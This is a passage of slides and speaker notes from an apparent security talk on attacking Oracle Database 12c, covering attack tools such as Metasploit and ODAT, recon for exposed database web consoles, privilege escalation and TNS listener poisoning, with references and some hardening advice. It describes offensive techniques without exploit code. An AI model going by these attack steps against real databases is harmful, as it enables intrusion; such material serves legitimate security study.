  • 40.
    Attack discovery approach •You may, of course, discover issues not introduced in 12c but rather propagating through multiple versions (such as the TNS poison vulnerability) …
  • 41.
  • 42.
    Tools • nmap • Metasploit •Tnscmd • ODAT (Oracle Database Attacking Tool) • w32dasm/ IDA Freeware • Kali Linux
  • 43.
    Tools • ODAT supports12.1.0.2.0: – try to find valid SIDs and credentials – try to escalate valid account to DBA or SYSDBA – try to execute OS commands from a valid account
  • 44.
    Some readings thatmay bring ideas …
  • 45.
    Some readings thatmay bring ideas …
  • 46.
  • 47.
    References Oracle 12c Securitywhitepaper http://www.oracle.com/technetwork/database/security/security-compliance- wp-12c-1896112.pdf Oracle Database 12c architecture overview https://www.youtube.com/watch?v=266ay9N6kAw Oracle Database 12c New security Features http://www.trivadis.com/sites/default/files/downloads/soe_oracle_da tabase_12_new_security_features_summary.pdf
  • 48.
    References Oracle Database 12csecurity http://docs.oracle.com/database/121/nav/portal_25.htm Oracle database security checklist http://www.isaca.org/groups/professional-english/oracle- database/groupdocuments/twp-security-checklist-database-1-132870.pdf Encryption and Redaction in Oracle Database 12c with Oracle Advanced Security http://www.oracle.com/technetwork/database/options/advanced- security/advanced-security-wp-12c-1896139.pdf
  • 49.
    References Privelege escalation viaOracle indexes http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf Attacking Oracle with the Metasploit Framework http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates- OracleMetasploit-SLIDES.pdf Oracle Database TNS Listener Poison Attack http://www.joxeankoret.com/download/tnspoison.pdf
  • 50.
    References ODAT (Oracle DatabaseAttacking Tool) tool https://github.com/quentinhardy/odat Oracle Database 12c CVE vulnerabilities statistics https://www.cvedetails.com/product/467/Oracle-Database- Server.html?vendor_id=93 Oracle Database 12c CVE vulnerabilities https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id- 467/cvssscoremin-5/cvssscoremax-5.99/Oracle-Database-Server.html

Editor's Notes

  • #7 A motivating factor
  • #8 A motivating factor
  • #9 Using 11g make sure you do not share usernames or update to 12c.
  • #10 Make sure you use encrypted connection to the TNS listener even if the database us not available publicly. This could turn out to be an insider attack in case of no encryption. You can also update to 12c.
  • #11 Isqlplus is not shipped with Oracle database anymore … You can also search for other “mask” URL path instead of ‘isqlplus’ You can also search for other well known web apps for database quering (that also support latest DB version) You can search for well-known messages from search applications You can also perform directory index searches Show demo on the attack
  • #12 Show demo on the attack
  • #13 Isqlplus is not shipped with Oracle database anymore … You can also search for other “mask” URL path instead of ‘isqlplus’ You can also search for other well known web apps for database quering (that also support latest DB version) You can search for well-known messages from search applications You can also perform directory index searches Show demo on the attack
  • #14 David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  • #15 David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  • #16 David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  • #17 David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  • #18 David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  • #19 David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  • #21 More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  • #23 More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  • #24 More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  • #25 More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  • #26 More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  • #27 More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  • #28 More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  • #29 More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.